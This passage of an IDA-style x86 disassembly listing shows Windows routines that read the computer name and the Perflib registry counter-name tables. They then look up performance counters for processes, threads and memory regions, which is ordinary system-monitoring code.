[ebp-8] 361723E0 pop ecx 361723E1 mov ebx, eax 361723E3 jmp short loc_36172382 361723E5 ; ─────────────────────────────────────────────────────────────────────────── 361723E5 361723E5 loc_361723E5: ; CODE XREF: .text:3617230Dj 361723E5 ; .text:361723BDj 361723E5 xor eax, eax 361723E7 jmp short loc_361723EC 361723E9 ; ─────────────────────────────────────────────────────────────────────────── 361723E9 361723E9 loc_361723E9: ; CODE XREF: .text:36172384j 361723E9 ; .text:3617238Fj 361723E9 mov eax, [ebp-18h] 361723EC 361723EC loc_361723EC: ; CODE XREF: .text:361723E7j 361723EC pop edi 361723ED pop esi 361723EE pop ebx 361723EF leave 361723F0 retn 361723F1 361723F1 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361723F1 361723F1 ; Attributes: bp-based frame 361723F1 361723F1 sub_361723F1 proc near ; CODE XREF: sub_36172278p 361723F1 361723F1 var_18 = byte ptr -18h 361723F1 var_17 = byte ptr -17h 361723F1 var_4 = dword ptr -4 361723F1 361723F1 push ebp 361723F2 mov ebp, esp 361723F4 sub esp, 18h 361723F7 mov eax, dword_36179484 361723FC push ebx 361723FD mov ebx, ds:RegCloseKey 36172403 push esi 36172404 push edi 36172405 mov edi, 80000004h 3617240A cmp eax, edi 3617240C mov [ebp+var_4], 12h 36172413 jz short loc_36172418 36172415 push eax 36172416 call ebx ; RegCloseKey 36172418 36172418 loc_36172418: ; CODE XREF: sub_361723F1+22j 36172418 mov eax, dword_36179488 3617241D mov esi, 80000002h 36172422 cmp eax, esi 36172424 jz short loc_36172429 36172426 push eax 36172427 call ebx ; RegCloseKey 36172429 36172429 loc_36172429: ; CODE XREF: sub_361723F1+33j 36172429 lea eax, [ebp+var_4] 3617242C mov dword_36179484, edi 36172432 push eax 36172433 lea eax, [ebp+var_18] 36172436 push eax 36172437 mov dword_36179488, esi 3617243D call ds:GetComputerNameA 36172443 cmp [ebp+var_18], 5Ch 36172447 jnz short loc_3617246B 36172449 cmp [ebp+var_17], 5Ch 3617244D jnz short loc_3617246B 3617244F mov edi, ds:lstrcpyA 36172455 lea eax, [ebp+var_18] 36172458 mov esi, offset byte_3617D618 3617245D push eax 3617245E push esi 3617245F call edi ; lstrcpyA 36172461 push esi 36172462 push offset byte_3617D62C 36172467 call edi ; lstrcpyA 36172469 jmp short loc_3617248F 3617246B ; ─────────────────────────────────────────────────────────────────────────── 3617246B 3617246B loc_3617246B: ; CODE XREF: sub_361723F1+56j 3617246B ; sub_361723F1+5Cj 3617246B lea eax, [ebp+var_18] 3617246E mov esi, offset byte_3617D618 36172473 push eax 36172474 push offset aS ; "\\\\%s" 36172479 push esi 3617247A call ds:sprintf 36172480 add esp, 0Ch 36172483 push esi 36172484 push offset byte_3617D62C 36172489 call ds:lstrcpyA 3617248F 3617248F loc_3617248F: ; CODE XREF: sub_361723F1+78j 3617248F pop edi 36172490 pop esi 36172491 pop ebx 36172492 leave 36172493 retn 36172493 sub_361723F1 endp 36172493 36172494 36172494 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172494 36172494 ; Attributes: bp-based frame 36172494 36172494 sub_36172494 proc near ; CODE XREF: sub_36172278+5p 36172494 36172494 var_C = dword ptr -0Ch 36172494 var_8 = dword ptr -8 36172494 var_4 = dword ptr -4 36172494 36172494 push ebp 36172495 mov ebp, esp 36172497 sub esp, 0Ch 3617249A lea eax, [ebp+var_8] 3617249D push eax 3617249E lea eax, [ebp+var_4] 361724A1 push eax 361724A2 lea eax, [ebp+var_C] 361724A5 push eax 361724A6 push dword_36179484 361724AC push dword_36179488 361724B2 call sub_36172AE2 361724B7 add esp, 14h 361724BA test eax, eax 361724BC jz short loc_361724C3 361724BE or eax, 0FFFFFFFFh 361724C1 leave 361724C2 retn 361724C3 ; ─────────────────────────────────────────────────────────────────────────── 361724C3 361724C3 loc_361724C3: ; CODE XREF: sub_36172494+28j 361724C3 push ebx 361724C4 push esi 361724C5 push edi 361724C6 push offset aProcess ; "Process" 361724CB push [ebp+var_8] 361724CE push [ebp+var_4] 361724D1 call sub_36172C91 361724D6 push offset aProcessorTime ; "% Processor Time" 361724DB mov dword_3617D5C8, eax 361724E0 push [ebp+var_8] 361724E3 push [ebp+var_4] 361724E6 call sub_36172C91 361724EB push offset aPrivilegedTime ; "% Privileged Time" 361724F0 mov dword_3617D5C4, eax 361724F5 push [ebp+var_8] 361724F8 push [ebp+var_4] 361724FB call sub_36172C91 36172500 mov ebx, offset aUserTime ; "% User Time" 36172505 mov dword_3617D5C0, eax 3617250A push ebx 3617250B push [ebp+var_8] 3617250E push [ebp+var_4] 36172511 call sub_36172C91 36172516 push offset aWorkingSet ; "Working Set" 3617251B mov dword_3617D5BC, eax 36172520 push [ebp+var_8] 36172523 push [ebp+var_4] 36172526 call sub_36172C91 3617252B push offset aWorkingSetPeak ; "Working Set Peak" 36172530 mov dword_3617D5B8, eax 36172535 push [ebp+var_8] 36172538 push [ebp+var_4] 3617253B call sub_36172C91 36172540 add esp, 48h 36172543 mov edi, offset aPriorityBase ; "Priority Base" 36172548 mov dword_3617D5B4, eax 3617254D push edi 3617254E push [ebp+var_8] 36172551 push [ebp+var_4] 36172554 call sub_36172C91 36172559 mov esi, offset aElapsedTime ; "Elapsed Time" 3617255E mov dword_3617D5B0, eax 36172563 push esi 36172564 push [ebp+var_8] 36172567 push [ebp+var_4] 3617256A call sub_36172C91 3617256F push offset aIdProcess ; "ID Process" 36172574 mov dword_3617D5AC, eax 36172579 push [ebp+var_8] 3617257C push [ebp+var_4] 3617257F call sub_36172C91 36172584 push offset aPrivateBytes ; "Private Bytes" 36172589 mov dword_3617D5A8, eax 3617258E push [ebp+var_8] 36172591 push [ebp+var_4] 36172594 call sub_36172C91 36172599 push offset aVirtualBytes ; "Virtual Bytes" 3617259E mov dword_3617D5A4, eax 361725A3 push [ebp+var_8] 361725A6 push [ebp+var_4] 361725A9 call sub_36172C91 361725AE push offset aVirtualBytesPe ; "Virtual Bytes Peak" 361725B3 mov dword_3617D5A0, eax 361725B8 push [ebp+var_8] 361725BB push [ebp+var_4] 361725BE call sub_36172C91 361725C3 add esp, 48h 361725C6 mov dword_3617D59C, eax 361725CB push offset aPageFaultsSec ; "Page Faults/sec" 361725D0 push [ebp+var_8] 361725D3 push [ebp+var_4] 361725D6 call sub_36172C91 361725DB push offset aThread ; "Thread" 361725E0 mov dword_3617D598, eax 361725E5 push [ebp+var_8] 361725E8 push [ebp+var_4] 361725EB call sub_36172C91 361725F0 push offset aProcessorTime ; "% Processor Time" 361725F5 mov dword_3617D570, eax 361725FA push [ebp+var_8] 361725FD push [ebp+var_4] 36172600 call sub_36172C91 36172605 push offset aPrivilegedTime ; "% Privileged Time" 3617260A mov dword_3617D56C, eax 3617260F push [ebp+var_8] 36172612 push [ebp+var_4] 36172615 call sub_36172C91 3617261A push ebx 3617261B mov dword_3617D568, eax 36172620 push [ebp+var_8] 36172623 push [ebp+var_4] 36172626 call sub_36172C91 3617262B push offset aStartAddress ; "Start Address" 36172630 mov dword_3617D564, eax 36172635 push [ebp+var_8] 36172638 push [ebp+var_4] 3617263B call sub_36172C91 36172640 add esp, 48h 36172643 mov dword_3617D560, eax 36172648 push offset aContextSwitche ; "Context Switches/sec" 3617264D push [ebp+var_8] 36172650 push [ebp+var_4] 36172653 call sub_36172C91 36172658 push offset aPriorityCurren ; "Priority Current" 3617265D mov dword_3617D55C, eax 36172662 push [ebp+var_8] 36172665 push [ebp+var_4] 36172668 call sub_36172C91 3617266D push edi 3617266E mov dword_3617D558, eax 36172673 push [ebp+var_8] 36172676 push [ebp+var_4] 36172679 call sub_36172C91 3617267E push esi 3617267F mov dword_3617D554, eax 36172684 push [ebp+var_8] 36172687 push [ebp+var_4] 3617268A call sub_36172C91 3617268F push offset aIdThread ; "ID Thread" 36172694 mov dword_3617D550, eax 36172699 push [ebp+var_8] 3617269C push [ebp+var_4] 3617269F call sub_36172C91 361726A4 push offset aThreadDetails ; "Thread Details" 361726A9 mov dword_3617D54C, eax 361726AE push [ebp+var_8] 361726B1 push [ebp+var_4] 361726B4 call sub_36172C91 361726B9 add esp, 48h 361726BC mov dword_3617D548, eax 361726C1 push offset aUserPc ; "User PC" 361726C6 push [ebp+var_8] 361726C9 push [ebp+var_4] 361726CC call sub_36172C91 361726D1 push offset aImage ; "Image" 361726D6 mov dword_3617D544, eax 361726DB push [ebp+var_8] 361726DE push [ebp+var_4] 361726E1 call sub_36172C91 361726E6 push offset aNoAccess ; "No Access" 361726EB mov dword_3617D540, eax 361726F0 push [ebp+var_8] 361726F3 push [ebp+var_4] 361726F6 call sub_36172C91 361726FB push offset aReadOnly ; "Read Only" 36172700 mov dword_3617D53C, eax 36172705 push [ebp+var_8] 36172708 push [ebp+var_4] 3617270B call sub_36172C91 36172710 push offset aReadWrite ; "Read/Write" 36172715 mov dword_3617D538, eax 3617271A push [ebp+var_8] 3617271D push [ebp+var_4] 36172720 call sub_36172C91 36172725 push offset aWriteCopy ; "Write Copy" 3617272A mov dword_3617D534, eax 3617272F push [ebp+var_8] 36172732 push [ebp+var_4] 36172735 call sub_36172C91 3617273A add esp, 48h 3617273D mov dword_3617D530, eax 36172742 push offset aExecutable ; "Executable" 36172747 push [ebp+var_8] 3617274A push [ebp+var_4] 3617274D call sub_36172C91 36172752 push offset aExecReadOnly ; "Exec Read Only" 36172757 mov dword_3617D52C, eax 3617275C push [ebp+var_8] 3617275F push [ebp+var_4] 36172762 call sub_36172C91 36172767 push offset aExecReadWrite ; "Exec Read/Write" 3617276C mov dword_3617D528, eax 36172771 push [ebp+var_8] 36172774 push [ebp+var_4] 36172777 call sub_36172C91 3617277C push offset aExecWriteCopy ; "Exec Write Copy" 36172781 mov dword_3617D524, eax 36172786 push [ebp+var_8] 36172789 push [ebp+var_4] 3617278C call sub_36172C91 36172791 push offset aProcessAddress ; "Process Address Space" 36172796 mov dword_3617D520, eax 3617279B push [ebp+var_8] 3617279E push [ebp+var_4] 361727A1 call sub_36172C91 361727A6 push offset aReservedSpaceN ; "Reserved Space No Access" 361727AB mov dword_3617D51C, eax 361727B0 push [ebp+var_8] 361727B3 push [ebp+var_4] 361727B6 call sub_36172C91 361727BB add esp, 48h 361727BE mov dword_3617D518, eax 361727C3 push offset aReservedSpaceR ; "Reserved Space Read Only" 361727C8 push [ebp+var_8] 361727CB push [ebp+var_4] 361727CE call sub_36172C91 361727D3 push offset aReservedSpac_0 ; "Reserved Space Read/Write" 361727D8 mov dword_3617D514, eax 361727DD push [ebp+var_8] 361727E0 push [ebp+var_4] 361727E3 call sub_36172C91 361727E8 push offset aReservedSpaceW ; "Reserved Space Write Copy" 361727ED mov dword_3617D510, eax 361727F2 push [ebp+var_8] 361727F5 push [ebp+var_4] 361727F8 call sub_36172C91 361727FD push offset aReservedSpaceE ; "Reserved Space Executable" 36172802 mov dword_3617D50C, eax 36172807 push [ebp+var_8] 3617280A push [ebp+var_4] 3617280D call sub_36172C91 36172812 push offset aReservedSpac_1 ; "Reserved Space Exec Read Only" 36172817 mov dword_3617D508, eax 3617281C push [ebp+var_8] 3617281F push [ebp+var_4] 36172822 call sub_36172C91 36172827 push offset aReservedSpac_2 ; "Reserved Space Exec Read/Write" 3617282C mov dword_3617D504, eax 36172831 push [ebp+var_8] 36172834 push [ebp+var_4] 36172837 call sub_36172C91 3617283C add esp, 48h 3617283F mov dword_3617D500, eax 36172844 push offset aReservedSpac_3 ; "Reserved Space Exec Write Copy" 36172849 push [ebp+var_8] 3617284C push [ebp+var_4] 3617284F call sub_36172C91 36172854 push offset aMappedSpaceNoA ; "Mapped Space No Access" 36172859 mov dword_3617D4FC, eax 3617285E push [ebp+var_8] 36172861 push [ebp+var_4] 36172864 call sub_36172C91 36172869 push offset aMappedSpaceRea ; "Mapped Space Read Only" 3617286E mov dword_3617D4F8, eax 36172873 push [ebp+var_8] 36172876 push [ebp+var_4] 36172879 call sub_36172C91 3617287E push offset aMappedSpaceR_0 ; "Mapped Space Read/Write" 36172883 mov dword_3617D4F4, eax 36172888 push [ebp+var_8] 3617288B push [ebp+var_4] 3617288E call sub_36172C91 36172893 mov dword_3617D4F0, eax 36172898 push offset aMappedSpaceWri ; "Mapped Space Write Copy" 3617289D push [ebp+var_8] 361728A0 push [ebp+var_4] 361728A3 call sub_36172C91 361728A8 push offset aMappedSpaceExe ; "Mapped Space Executable" 361728AD mov dword_3617D4EC, eax 361728B2 push [ebp+var_8] 361728B5 push [ebp+var_4] 361728B8 call sub_36172C91 361728BD add esp, 48h 361728C0 mov dword_3617D4E8, eax 361728C5 push offset aMappedSpaceE_0 ; "Mapped Space Exec Read Only" 361728CA push [ebp+var_8] 361728CD push [ebp+var_4] 361728D0 call sub_36172C91 361728D5 push offset aMappedSpaceE_1 ; "Mapped Space Exec Read/Write" 361728DA mov dword_3617D4E4, eax 361728DF push [ebp+var_8] 361728E2 push [ebp+var_4] 361728E5 call sub_36172C91 361728EA push offset aMappedSpaceE_2 ; "Mapped Space Exec Write Copy" 361728EF mov dword_3617D4E0, eax 361728F4 push [ebp+var_8] 361728F7 push [ebp+var_4] 361728FA call sub_36172C91 361728FF push offset aImageSpaceNoAc ; "Image Space No Access" 36172904 mov dword_3617D4DC, eax 36172909 push [ebp+var_8] 3617290C push [ebp+var_4] 3617290F call sub_36172C91 36172914 push offset aImageSpaceRead ; "Image Space Read Only" 36172919 mov dword_3617D4D8, eax 3617291E push [ebp+var_8] 36172921 push [ebp+var_4] 36172924 call sub_36172C91 36172929 push offset aImageSpaceRe_0 ; "Image Space Read/Write" 3617292E mov dword_3617D4D4, eax 36172933 push [ebp+var_8] 36172936 push [ebp+var_4] 36172939 call sub_36172C91 3617293E add esp, 48h 36172941 mov dword_3617D4D0, eax 36172946 push offset aImageSpaceWrit ; "Image Space Write Copy" 3617294B push [ebp+var_8] 3617294E push [ebp+var_4] 36172951 call sub_36172C91 36172956 push offset aImageSpaceExec ; "Image Space Executable" 3617295B mov dword_3617D4CC, eax 36172960 push [ebp+var_8] 36172963 push [ebp+var_4] 36172966 call sub_36172C91 3617296B push offset aImageSpaceEx_0 ; "Image Space Exec Read Only" 36172970 mov dword_3617D4C8, eax 36172975 push [ebp+var_8] 36172978 push [ebp+var_4] 3617297B call sub_36172C91 36172980 push offset aImageSpaceEx_1 ; "Image Space Exec Read/Write" 36172985 mov dword_3617D4C4, eax 3617298A push [ebp+var_8] 3617298D push [ebp+var_4] 36172990 call sub_36172C91 36172995 push offset aImageSpaceEx_2 ; "Image Space Exec Write Copy" 3617299A mov dword_3617D4C0, eax 3617299F push [ebp+var_8] 361729A2 push [ebp+var_4] 361729A5 call sub_36172C91 361729AA push dword_3617D570 361729B0 mov esi, ds:sprintf 361729B6 mov dword_3617D4BC, eax 361729BB push dword_3617D5C8 361729C1 push offset aLdLd ; "%ld %ld" 361729C6 push offset byte_3617D604 361729CB call esi ; sprintf 361729CD add esp, 4Ch 361729D0 push dword_3617D548 361729D6 push dword_3617D540 361729DC push dword_3617D51C 361729E2 push offset aLdLdLd ; "%ld %ld %ld" 361729E7 push offset byte_3617D5E4 361729EC call esi ; sprintf 361729EE add esp, 14h 361729F1 push [ebp+var_C] 361729F4 mov esi, ds:LocalFree 361729FA call esi ; LocalFree 361729FC push [ebp+var_4] 361729FF call esi ; LocalFree 36172A01 pop edi 36172A02 pop esi 36172A03 xor eax, eax 36172A05 pop ebx 36172A06 leave 36172A07 retn 36172A07 sub_36172494 endp 36172A07 36172A08 36172A08 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A08 36172A08 ; Attributes: bp-based frame 36172A08 36172A08 sub_36172A08 proc near ; CODE XREF: .text:361722ABp 36172A08 36172A08 arg_0 = dword ptr 8 36172A08 arg_4 = dword ptr 0Ch 36172A08 arg_8 = dword ptr 10h 36172A08 arg_C = dword ptr 14h 36172A08 36172A08 push ebp 36172A09 mov ebp, esp 36172A0B push [ebp+arg_C] 36172A0E lea eax, [ebp+arg_8] 36172A11 push eax 36172A12 push [ebp+arg_4] 36172A15 push [ebp+arg_0] 36172A18 call sub_36172CC1 36172A1D add esp, 10h 36172A20 neg eax 36172A22 sbb eax, eax 36172A24 not eax 36172A26 and eax, [ebp+arg_8] 36172A29 pop ebp 36172A2A retn 36172A2A sub_36172A08 endp 36172A2A 36172A2B 36172A2B ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A2B 36172A2B 36172A2B sub_36172A2B proc near ; CODE XREF: .text:361722BDp 36172A2B ; .text:3617235Ap 36172A2B 36172A2B arg_0 = dword ptr 8 36172A2B arg_4 = dword ptr 0Ch 36172A2B 36172A2B push esi 36172A2C mov esi, [esp+arg_0] 36172A30 push edi 36172A31 push esi 36172A32 xor edi, edi 36172A34 call sub_36172D40 36172A39 cmp eax, edi 36172A3B pop ecx 36172A3C jz short loc_36172A59 36172A3E cmp [esi+1Ch], edi 36172A41 jbe short loc_36172A59 36172A43 36172A43 loc_36172A43: ; CODE XREF: sub_36172A2B+2Cj 36172A43 mov ecx, [eax+0Ch] 36172A46 cmp ecx, [esp+4+arg_4] 36172A4A jz short loc_36172A5B 36172A4C push eax 36172A4D call sub_36172D51 36172A52 inc edi 36172A53 pop ecx 36172A54 cmp edi, [esi+1Ch] 36172A57 jb short loc_36172A43 36172A59 36172A59 loc_36172A59: ; CODE XREF: sub_36172A2B+11j 36172A59 ; sub_36172A2B+16j 36172A59 xor eax, eax 36172A5B 36172A5B loc_36172A5B: ; CODE XREF: sub_36172A2B+1Fj 36172A5B pop edi 36172A5C pop esi 36172A5D retn 36172A5D sub_36172A2B endp 36172A5D 36172A5E 36172A5E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A5E 36172A5E 36172A5E sub_36172A5E proc near ; CODE XREF: .text:361722CCp 36172A5E ; .text:36172369p 36172A5E 36172A5E arg_0 = dword ptr 8 36172A5E arg_4 = dword ptr 0Ch 36172A5E 36172A5E push esi 36172A5F mov esi, [esp+arg_0] 36172A63 push edi 36172A64 push esi 36172A65 xor edi, edi 36172A67 call sub_36172D61 36172A6C cmp eax, edi 36172A6E pop ecx 36172A6F jz short loc_36172A8C 36172A71 cmp [esi+20h], edi 36172A74 jbe short loc_36172A8C 36172A76 36172A76 loc_36172A76: ; CODE XREF: sub_36172A5E+2Cj 36172A76 mov ecx, [eax+4] 36172A79 cmp ecx, [esp+4+arg_4] 36172A7D jz short loc_36172A8E 36172A7F push eax 36172A80 call sub_36172D51 36172A85 inc edi 36172A86 pop ecx 36172A87 cmp edi, [esi+20h] 36172A8A jb short loc_36172A76 36172A8C 36172A8C loc_36172A8C: ; CODE XREF: sub_36172A5E+11j 36172A8C ; sub_36172A5E+16j 36172A8C xor eax, eax 36172A8E 36172A8E loc_36172A8E: ; CODE XREF: sub_36172A5E+1Fj 36172A8E pop edi 36172A8F pop esi 36172A90 retn 36172A90 sub_36172A5E endp 36172A90 36172A91 36172A91 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172A91 36172A91 36172A91 sub_36172A91 proc near ; CODE XREF: .text:361722DDp 36172A91 ; .text:36172374p 36172A91 36172A91 arg_0 = dword ptr 4 36172A91 36172A91 mov ecx, [esp+arg_0] 36172A95 test ecx, ecx 36172A97 jz short loc_36172A9F 36172A99 mov eax, [ecx+4] 36172A9C add eax, ecx 36172A9E retn 36172A9F ; ─────────────────────────────────────────────────────────────────────────── 36172A9F 36172A9F loc_36172A9F: ; CODE XREF: sub_36172A91+6j 36172A9F xor eax, eax 36172AA1 retn 36172AA1 sub_36172A91 endp 36172AA1 36172AA2 36172AA2 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172AA2 36172AA2 36172AA2 sub_36172AA2 proc near ; CODE XREF: .text:36172319p 36172AA2 ; .text:361723CCp 36172AA2 36172AA2 arg_0 = dword ptr 4 36172AA2 arg_4 = dword ptr 8 36172AA2 36172AA2 mov eax, [esp+arg_4] 36172AA6 test eax, eax 36172AA8 jz short loc_36172ABA 36172AAA mov ecx, [esp+arg_0] 36172AAE test ecx, ecx 36172AB0 jz short loc_36172ABA 36172AB2 mov eax, [eax+24h] 36172AB5 add eax, [ecx] 36172AB7 add eax, ecx 36172AB9 retn 36172ABA ; ─────────────────────────────────────────────────────────────────────────── 36172ABA 36172ABA loc_36172ABA: ; CODE XREF: sub_36172AA2+6j 36172ABA ; sub_36172AA2+Ej 36172ABA xor eax, eax 36172ABC retn 36172ABC sub_36172AA2 endp 36172ABC 36172ABD 36172ABD ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172ABD 36172ABD 36172ABD sub_36172ABD proc near ; CODE XREF: .text:36172323p 36172ABD 36172ABD arg_0 = dword ptr 4 36172ABD 36172ABD mov ecx, [esp+arg_0] 36172AC1 test ecx, ecx 36172AC3 jz short loc_36172ACB 36172AC5 mov eax, [ecx+10h] 36172AC8 add eax, ecx 36172ACA retn 36172ACB ; ─────────────────────────────────────────────────────────────────────────── 36172ACB 36172ACB loc_36172ACB: ; CODE XREF: sub_36172ABD+6j 36172ACB xor eax, eax 36172ACD retn 36172ACD sub_36172ABD endp 36172ACD 36172ACE 36172ACE ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172ACE 36172ACE 36172ACE sub_36172ACE proc near ; CODE XREF: .text:3617233Cp 36172ACE ; .text:361723D8p 36172ACE 36172ACE arg_0 = dword ptr 4 36172ACE 36172ACE mov eax, [esp+arg_0] 36172AD2 test eax, eax 36172AD4 jz short loc_36172ADF 36172AD6 mov ecx, [eax] 36172AD8 add ecx, eax 36172ADA mov eax, [ecx] 36172ADC add eax, ecx 36172ADE retn 36172ADF ; ─────────────────────────────────────────────────────────────────────────── 36172ADF 36172ADF loc_36172ADF: ; CODE XREF: sub_36172ACE+6j 36172ADF xor eax, eax 36172AE1 retn 36172AE1 sub_36172ACE endp 36172AE1 36172AE2 36172AE2 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172AE2 36172AE2 ; Attributes: bp-based frame 36172AE2 36172AE2 sub_36172AE2 proc near ; CODE XREF: sub_36172494+1Ep 36172AE2 36172AE2 var_18 = byte ptr -18h 36172AE2 var_14 = dword ptr -14h 36172AE2 var_10 = byte ptr -10h 36172AE2 var_C = dword ptr -0Ch 36172AE2 var_8 = dword ptr -8 36172AE2 var_4 = dword ptr -4 36172AE2 arg_0 = dword ptr 8 36172AE2 arg_4 = dword ptr 0Ch 36172AE2 arg_8 = dword ptr 10h 36172AE2 arg_C = dword ptr 14h 36172AE2 arg_10 = dword ptr 18h 36172AE2 36172AE2 push ebp 36172AE3 mov ebp, esp 36172AE5 sub esp, 18h 36172AE8 mov ecx, [ebp+arg_C] 36172AEB push ebx 36172AEC push esi 36172AED mov esi, [ebp+arg_8] 36172AF0 xor eax, eax 36172AF2 push edi 36172AF3 mov [esi], eax 36172AF5 mov [ecx], eax 36172AF7 lea ecx, [ebp+var_8] 36172AFA mov edi, ds:RegOpenKeyExA 36172B00 mov ebx, 20019h 36172B05 push ecx 36172B06 push ebx 36172B07 push eax 36172B08 push offset aSoftwareMicr_1 ; "software\\microsoft\\windows nt\\currentve"... 36172B0D mov [ebp+var_8], eax 36172B10 push [ebp+arg_0] 36172B13 mov [ebp+var_C], eax 36172B16 call edi ; RegOpenKeyExA 36172B18 test eax, eax 36172B1A mov [ebp+arg_8], eax 36172B1D jnz loc_36172BF2 36172B23 lea eax, [ebp+var_4] 36172B26 mov [ebp+var_4], 4 36172B2D push eax 36172B2E lea eax, [ebp+var_10] 36172B31 push [ebp+arg_10] 36172B34 push eax 36172B35 push 0 36172B37 push offset aLastCounter ; "Last Counter" 36172B3C push [ebp+var_8] 36172B3F call ds:RegQueryValueExA 36172B45 test eax, eax 36172B47 mov [ebp+arg_8], eax 36172B4A jnz loc_36172BF2 36172B50 lea eax, [ebp+var_4] 36172B53 push eax 36172B54 lea eax, [ebp+var_18] 36172B57 push eax 36172B58 lea eax, [ebp+var_10] 36172B5B push eax 36172B5C push 0 36172B5E push offset aVersion ; "Version" 36172B63 push [ebp+var_8] 36172B66 call ds:RegQueryValueExA 36172B6C test eax, eax 36172B6E jz short loc_36172B91 36172B70 lea eax, [ebp+var_C] 36172B73 mov [ebp+var_14], offset aCounters ; "Counters" 36172B7A push eax 36172B7B push ebx 36172B7C push 0 36172B7E push offset aSoftwareMicr_2 ; "software\\microsoft\\windows nt\\currentve"... 36172B83 push [ebp+arg_0] 36172B86 call edi ; RegOpenKeyExA 36172B88 test eax, eax 36172B8A mov [ebp+arg_8], eax 36172B8D jnz short loc_36172BF2 36172B8F jmp short loc_36172B9E 36172B91 ; ─────────────────────────────────────────────────────────────────────────── 36172B91 36172B91 loc_36172B91: ; CODE XREF: sub_36172AE2+8Cj 36172B91 mov eax, [ebp+arg_4] 36172B94 mov [ebp+var_14], offset aCounter009 ; "Counter 009" 36172B9B mov [ebp+var_C], eax 36172B9E 36172B9E loc_36172B9E: ; CODE XREF: sub_36172AE2+ADj 36172B9E lea eax, [ebp+var_4] 36172BA1 mov ebx, ds:RegQueryValueExA 36172BA7 push eax 36172BA8 lea eax, [ebp+var_10] 36172BAB push 0 36172BAD push eax 36172BAE push 0 36172BB0 push [ebp+var_14] 36172BB3 push [ebp+var_C] 36172BB6 call ebx ; RegQueryValueExA 36172BB8 test eax, eax 36172BBA mov [ebp+arg_8], eax 36172BBD jnz short loc_36172BF2 36172BBF push [ebp+var_4] 36172BC2 mov edi, ds:LocalAlloc 36172BC8 push eax 36172BC9 call edi ; LocalAlloc 36172BCB test eax, eax 36172BCD mov [esi], eax 36172BCF jz short loc_36172BEB 36172BD1 mov eax, [ebp+arg_10] 36172BD4 mov eax, [eax] 36172BD6 lea eax, ds:4[eax*4] 36172BDD push eax 36172BDE push 40h 36172BE0 call edi ; LocalAlloc 36172BE2 mov ecx, [ebp+arg_C] 36172BE5 test eax, eax 36172BE7 mov [ecx], eax 36172BE9 jnz short loc_36172C35 36172BEB 36172BEB loc_36172BEB: ; CODE XREF: sub_36172AE2+EDj 36172BEB mov [ebp+arg_8], 8 36172BF2 36172BF2 loc_36172BF2: ; CODE XREF: sub_36172AE2+3Bj 36172BF2 ; sub_36172AE2+68j ... 36172BF2 mov esi, [esi] 36172BF4 mov edi, ds:LocalFree 36172BFA test esi, esi 36172BFC jz short loc_36172C01 36172BFE push esi 36172BFF call edi ; LocalFree 36172C01 36172C01 loc_36172C01: ; CODE XREF: sub_36172AE2+11Aj 36172C01 mov eax, [ebp+arg_C] 36172C04 mov eax, [eax] 36172C06 test eax, eax 36172C08 jz short loc_36172C0D 36172C0A push eax 36172C0B call edi ; LocalFree 36172C0D 36172C0D loc_36172C0D: ; CODE XREF: sub_36172AE2+126j 36172C0D ; sub_36172AE2+17Dj ... 36172C0D cmp [ebp+var_8], 0 36172C11 mov esi, ds:RegCloseKey 36172C17 jz short loc_36172C1E 36172C19 push [ebp+var_8] 36172C1C call esi ; RegCloseKey 36172C1E 36172C1E loc_36172C1E: ; CODE XREF: sub_36172AE2+135j 36172C1E mov eax, [ebp+var_C] 36172C21 test eax, eax 36172C23 jz short loc_36172C2D 36172C25 cmp eax, [ebp+arg_4] 36172C28 jz short loc_36172C2D 36172C2A push eax 36172C2B call esi ; RegCloseKey 36172C2D 36172C2D loc_36172C2D: ; CODE XREF: sub_36172AE2+141j 36172C2D ; sub_36172AE2+146j 36172C2D mov eax, [ebp+arg_8] 36172C30 pop edi 36172C31 pop esi 36172C32 pop ebx 36172C33 leave 36172C34 retn 36172C35 ; ─────────────────────────────────────────────────────────────────────────── 36172C35 36172C35 loc_36172C35: ; CODE XREF: sub_36172AE2+107j 36172C35 lea eax, [ebp+var_4] 36172C38 push eax 36172C39 lea eax, [ebp+var_10] 36172C3C push dword ptr [esi] 36172C3E push eax 36172C3F push 0 36172C41 push [ebp+var_14] 36172C44 push [ebp+var_C] 36172C47 call ebx ; RegQueryValueExA 36172C49 test eax, eax 36172C4B mov [ebp+arg_8], eax 36172C4E jnz short loc_36172BF2 36172C50 mov esi, [esi] 36172C52 mov edi, ds:lstrlenA 36172C58 push esi 36172C59 call edi ; lstrlenA 36172C5B mov ebx, eax 36172C5D test ebx, ebx 36172C5F jz short loc_36172C0D 36172C61 36172C61 loc_36172C61: ; CODE XREF: sub_36172AE2+1A8j 36172C61 push esi 36172C62 call ds:atoi 36172C68 pop ecx 36172C69 lea esi, [esi+ebx+1] 36172C6D mov ecx, [ebp+arg_10] 36172C70 cmp eax, [ecx] 36172C72 ja short loc_36172C7C 36172C74 mov ecx, [ebp+arg_C] 36172C77 mov ecx, [ecx] 36172C79 mov [ecx+eax*4], esi 36172C7C 36172C7C loc_36172C7C: ; CODE XREF: sub_36172AE2+190j 36172C7C push esi 36172C7D call edi ; lstrlenA 36172C7F lea esi, [esi+eax+1] 36172C83 push esi 36172C84 call edi ; lstrlenA 36172C86 mov ebx, eax 36172C88 test ebx, ebx 36172C8A jnz short loc_36172C61 36172C8C jmp loc_36172C0D 36172C8C sub_36172AE2 endp 36172C8C 36172C91 36172C91 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172C91 36172C91 36172C91 sub_36172C91 proc near ; CODE XREF: sub_36172494+3Dp 36172C91 ; sub_36172494+52p ... 36172C91 36172C91 arg_0 = dword ptr 8 36172C91 arg_4 = dword ptr 0Ch 36172C91 arg_8 = dword ptr 10h 36172C91 36172C91 push esi 36172C92 mov esi, [esp+arg_0] 36172C96 push edi 36172C97 xor edi, edi 36172C99 36172C99 loc_36172C99: ; CODE XREF: sub_36172C91+25j 36172C99 mov eax, [esi] 36172C9B test eax, eax 36172C9D jz short loc_36172CAE 36172C9F push [esp+4+arg_8] 36172CA3 push eax 36172CA4 call ds:lstrcmpiA 36172CAA test 